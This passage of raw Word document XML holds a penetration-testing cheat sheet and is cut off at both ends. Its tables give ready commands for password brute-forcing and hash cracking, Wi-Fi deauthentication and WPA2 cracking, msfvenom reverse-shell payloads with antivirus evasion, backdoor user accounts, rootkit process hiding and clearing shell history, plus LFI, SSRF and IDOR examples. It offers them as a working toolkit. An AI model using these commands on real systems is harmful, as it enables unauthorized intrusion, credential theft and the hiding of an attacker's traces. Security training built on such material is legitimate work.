              <w:t>Dir Bruteforce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45581CD2" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FE418A9" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="20BE577A">
          <v:rect id="_x0000_i1096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92F678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6. Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0622CC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Brute force, cracking, spraying.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5458"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="6BCA67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1D7B4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D6D0E4C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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="2F36A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E1146" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03E97B95" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>hydra -l admin -P rockyou.txt ssh://192.168.1.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="686F7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5CBB" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5D616E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>john --wordlist=rockyou.txt hashes.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="684EF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C3BD" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="378AF111" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>hashcat -m 0 -a 0 hash.txt rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="38ABB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0B45" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Medusa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DCB3B38" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>medusa -h 192.168.1.10 -u admin -P rockyou.txt -M ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E5BE786" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="412EB538">
          <v:rect id="_x0000_i1097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CDB9C1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7. Wireless Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5BCBD2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Wi-Fi pentesting = must-have skill.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4582"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="01A592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725A8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85C8D4D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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="0669DB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7A90" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Monitor Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BF6CED7" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>airmon-ng start wlan0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="2837B2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1548" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Capture Handshake</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AC52560" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>airodump-ng wlan0mon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="446136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6E3A" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Deauth Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C4F9703" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>aireplay-ng --deauth 10 -a AP_MAC wlan0mon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="0BF184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8E60" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Crack WPA2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65FBE79E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>aircrack-ng -w rockyou.txt capture.cap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B64810D" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pro Tip:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> WPA3 requires Evil Twin + downgrade attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7B9BE" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="37EAED47">
          <v:rect id="_x0000_i1098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="485DAF0D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8. Advanced Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D115752" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> Going pro = advanced shells, payloads, AV evasion.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52"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="03122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FB736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663464F6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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="530FE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B8AB" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Generate Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="608E6D9C" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe &gt; shell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="0399C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9EFA" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>AV Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E2F9CA8" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>msfvenom -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 5 -f exe &gt; evilshell.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="4BA8E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3495" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB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14ACFE6A" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>pattern_create.rb -l 3000 + pattern_offset.rb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="5CDF2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CB22" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>PrivEsc (Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06329087" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>linpeas.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="21B2E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8104" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>PrivEsc (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49036127" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>winPEAS.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="668E0828" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="4A9D7EA8">
          <v:rect id="_x0000_i1099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DBE2AF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9. Persistence &amp; Covering Tracks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507"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="2696B2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452F4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43F2C64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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="2F10C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E441" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Add User (Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D98841B" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>useradd -m backdoor -s /bin/bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="1A347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A4FB" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Add User (Win)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC90793" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>net user backdoor P@ssw0rd! /add</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="45BF0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9B9D" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Hide Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F2B964" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>rootkit or kernel module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="3803D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8BDD" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Clear Bash History</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FCD74B9" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>history -c &amp;&amp; history -w</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="072C78A7" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="1710BFE9">
          <v:rect id="_x0000_i1100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="501D487A" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Bug Bounty &amp; Real-World Hunting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4738"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="15F754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257CD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9F0107" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C77BBB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="75324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BB4E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F727654" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>subfinder + httpx + nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="03CD3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325D" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB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0D7D9D9" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>hakrawler target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="5F862D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AB1C" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>LFI to RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F0E37F8" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Upload PHP shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="210B9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1864" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351C7D9C" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>http://target.com/fetch?url=http://127.0.0.1:22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w14:paraId="23DDC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81CC" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="075D5DA2" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
            <w:r w:rsidRPr="00C77BBB">
              <w:t>Change user_id=100 → user_id=101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D25647E" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:r w:rsidRPr="00C77BBB">
        <w:pict w14:anchorId="789F0F0E">
          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CF84F" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Notes &amp; Tips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311ED3EE" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve">Always start with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information gathering</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> → 80% hacking is recon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B5143A" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Build your </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>own wordlists</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> from target data (cewl, crunch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5A279" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve">Never skip </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>manual testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> → tools miss real bugs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6FF01" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve">Learn </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scripting (Python, Bash)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve"> to automate repetitive tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5631BDBA" w14:textId="77777777" w:rsidR="00C77BBB" w:rsidRPr="00C77BBB" w:rsidRDefault="00C77BBB" w:rsidP="00C77BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C77BBB">
